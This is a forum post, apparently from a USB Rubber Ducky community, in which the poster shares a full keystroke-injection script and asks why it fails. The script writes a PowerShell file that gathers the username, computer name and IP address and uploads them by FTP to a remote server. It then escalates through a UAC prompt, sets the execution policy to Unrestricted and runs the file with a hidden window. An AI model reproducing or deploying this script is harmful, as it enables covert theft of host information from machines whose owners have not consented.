Jump to content

Recommended Posts

Posted

Wrote a ducky script to capture Computer Name, Username, IP address and Current Time stamp through a Powershell script. Never works the way I want  after encoding it and using the BIN file. The RUN window never opens and nor does notepad. It randomly opens some excel file on the desktop and writes the STRING values there. The powershell commands at the end of the script seem to executed fine in the RUN window, but since the PS1 file is never created using notepad, they are useless. I feel it might have to do something with the encoding - I've tried GB and US (my keyboard layout is US). I have verified that the powershell script works otherwise. For encoding, I have tried both - encoder on DUCKTOOLKIT site as well as the local JAR encoder. I have also tried with all DELAYs more than 1000. Need help in figuring out what's going wrong?

NOTE: the username, password and server were replaced with correct values in the actual script. Successfully verified the PS script.

Ducky Script -

DELAY 500
GUI R
DELAY 500
STRING notepad
DELAY 500
ENTER
DELAY 1000
STRING $username = $env:username
ENTER
STRING $computername = $env:computername
ENTER
STRING $ipaddress = ([System.Net.DNS]::GetHostAddresses($env:computername) | Where-Object {$_.AddressFamily -eq "InterNetwork"} | select-object IPAddressToString)[0].IPAddressToString
ENTER
STRING $timestamp = (get-date).ToString('d-M-y HH:mm:ss')
ENTER
STRING $File = "C:\Users\$username\$computername.txt"
ENTER
STRING "Computername: $computername" >> $File
ENTER
STRING "Username: $username" >> $File
ENTER
STRING "IP-Address: $ipaddress" >> $File
ENTER
STRING "Time: $timestamp" >> $File
ENTER
STRING "`n" >> $File
ENTER
STRING $ftp = "ftp://username:password@server/Ducky/$computername.txt"
ENTER
STRING $webclient = New-Object System.Net.WebClient
ENTER
STRING $uri = New-Object System.Uri($ftp)
ENTER
STRING $webclient.UploadFile($uri, $File)
ENTER
STRING $wshell = New-Object -ComObject Wscript.Shell
ENTER
STRING $wshell.Popup("Bazinga",0,"OOPS",0x1)
DELAY 3000
CTRL s
DELAY 1000
STRING %TEMP%\cache.ps1
TAB
DELAY 1000
DOWNARROW
DOWNARROW
DELAY 2000
ENTER
ALT s
DELAY 1000
ALT F4
DELAY 1000
GUI r
DELAY 500    
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 500  
ALT y
DELAY 500  
STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false
ENTER
DELAY 500  
STRING powershell.exe -windowstyle hidden -File %TEMP%\cache.ps1
ENTER

  • 2 months later...
  • 3 weeks later...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...